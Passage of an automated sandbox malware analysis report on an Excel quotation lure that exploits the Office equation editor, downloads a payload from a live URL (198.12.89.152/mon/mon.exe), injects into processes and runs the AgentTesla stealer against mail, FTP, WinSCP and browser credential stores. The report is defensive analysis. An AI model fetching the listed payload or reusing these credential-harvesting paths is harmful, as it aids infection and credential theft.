Source: EQNEDT32.EXE, 00000002.00000002.980394637.00000000005A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Enables debug privileges
Source: C:\Users\Public\Regasm_svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05E2 mov edx, dword ptr fs:[00000030h] 2_2_033F05E2
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\Regasm_svchost.exe Memory written: C:\Users\Public\Regasm_svchost.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe" Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\Regasm_svchost.exe Queries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Queries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 680486 Sample: Quotation - Optical Eyeglas... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 11 other signatures 2->42 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 34 35 2->12         started        process3 dnsIp4 26 198.12.89.152, 49179, 80 AS-COLOCROSSINGUS United States 7->26 20 C:\Users\user\AppData\Local\...\mon[1].exe, PE32 7->20 dropped 22 C:\Users\Public\Regasm_svchost.exe, PE32 7->22 dropped 44 Office equation editor establishes network connection 7->44 46 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->46 14 Regasm_svchost.exe 7->14         started        24 C:\...\~$Quotation - Optical Eyeglasses.xlsx, data 12->24 dropped file5 signatures6 process7 signatures8 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->48 50 Machine Learning detection for dropped file 14->50 52 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->52 54 Injects a PE file into a foreign processes 14->54 17 Regasm_svchost.exe 12 2 14->17         started        process9 signatures10 28 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->28 30 Tries to steal Mail credentials (via file / registry access) 17->30 32 Tries to harvest and steal ftp login credentials 17->32 34 Tries to harvest and steal browser information (history, passwords, etc) 17->34
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.12.89.152
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.12.89.152/mon/mon.exe true
  • Avira URL Cloud: malware
 unknown